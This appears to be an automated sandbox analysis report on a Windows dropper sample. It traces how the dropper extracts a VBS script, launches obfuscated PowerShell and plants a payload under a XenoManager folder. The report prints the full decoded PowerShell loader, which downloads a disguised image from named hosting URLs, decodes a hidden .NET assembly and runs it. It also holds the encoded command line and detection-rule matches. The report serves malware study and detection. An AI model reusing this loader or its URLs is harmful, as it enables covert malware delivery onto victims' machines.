            Source: powershell.exe, 00000005.00000002.2582750813.00000260879DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2276617831.000002031D3DA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F038000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2276617831.000002031D36F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031EE11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2276617831.000002031D350000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2278924771.000002031D630000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279013760.000002031D664000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ofice365.github.io/1/test.jpg
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://preferences.atlassian.com
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F1F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F1F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F1F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.atlassian.com/try/cloud/signup?bundle=bitbucket
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709

            System Summary

            barindex
            Source: Process Memory Space: powershell.exe PID: 1352, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 5388, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
            Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}
            Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = '[obfuscated base64 blob removed; the decoded script appears under Data Obfuscation]'"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Code function: 0_2_00007FF6A1D82C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF6A1D82C54
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Code function: 0_2_00007FF6A1D81C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF6A1D81C0C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Code function: 0_2_00007FF6A1D81D28
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Code function: 0_2_00007FF6A1D866C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Code function: 0_2_00007FF6A1D840C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Code function: 0_2_00007FF6A1D86CA4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Code function: 0_2_00007FF6A1D82DB4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Code function: 0_2_00007FF6A1D85D90
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Code function: 0_2_00007FF6A1D83530
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Code function: 0_2_00007FF6A1D81C0C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD347822FB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD34780F5D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD347831D5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_06900B13
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 5932 bytes, 1 file, at 0x2c +A "67a7e5e159f71.vbs", ID 1258, number 1, 1 datablock, 0x1503 compression
            Source: Vbc.exe.9.dr Static PE information: Resource name: RT_STRING type: VAX-order2 68k Blit mpx/mux executable
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Binary or memory string: OriginalFilename vs SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe, 00000000.00000002.2118655895.00007FF6A1D8E000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe
            Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5188
            Source: Process Memory Space: powershell.exe PID: 1352, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 5388, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engine Classification label: mal100.spre.troj.expl.evad.winEXE@18/11@2/3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Code function: 0_2_00007FF6A1D86CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF6A1D86CA4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Code function: 0_2_00007FF6A1D81C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF6A1D81C0C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Code function: 0_2_00007FF6A1D866C4 LocalAlloc,LocalFree,lstrcmpA,LocalFree,GetTempPathA,GetDriveTypeA,GetFileAttributesA,GetDiskFreeSpaceA,MulDiv,GetWindowsDirectoryA,GetFileAttributesA,CreateDirectoryA,SetFileAttributesA,GetWindowsDirectoryA,0_2_00007FF6A1D866C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Code function: 0_2_00007FF6A1D87AC8 FindResourceA,LoadResource,DialogBoxIndirectParamA,FreeResource,0_2_00007FF6A1D87AC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File created: C:\Users\user\AppData\Roaming\XenoManager
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2644:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5176:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3940:120:WilError_03
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c 67a7e5e159f71.vbs
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\cmd.exe File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Virustotal: Detection: 41%
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe ReversingLabs: Detection: 39%
            Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c 67a7e5e159f71.vbs
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ
@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.drbfojS/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Vbc', '0'))}}" .exe -windowstyle hidden -exec
            Source: unknown Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Vbc.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process created: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe "C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe"
            Source: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Section loaded: cabinet.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Section loaded: feclient.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Section loaded: advpack.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: propsys.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: edputil.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: urlmon.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: iertutil.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: policymanager.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: wintypes.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: appresolver.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: slc.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: sppc.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: pcacli.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: sfc_os.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
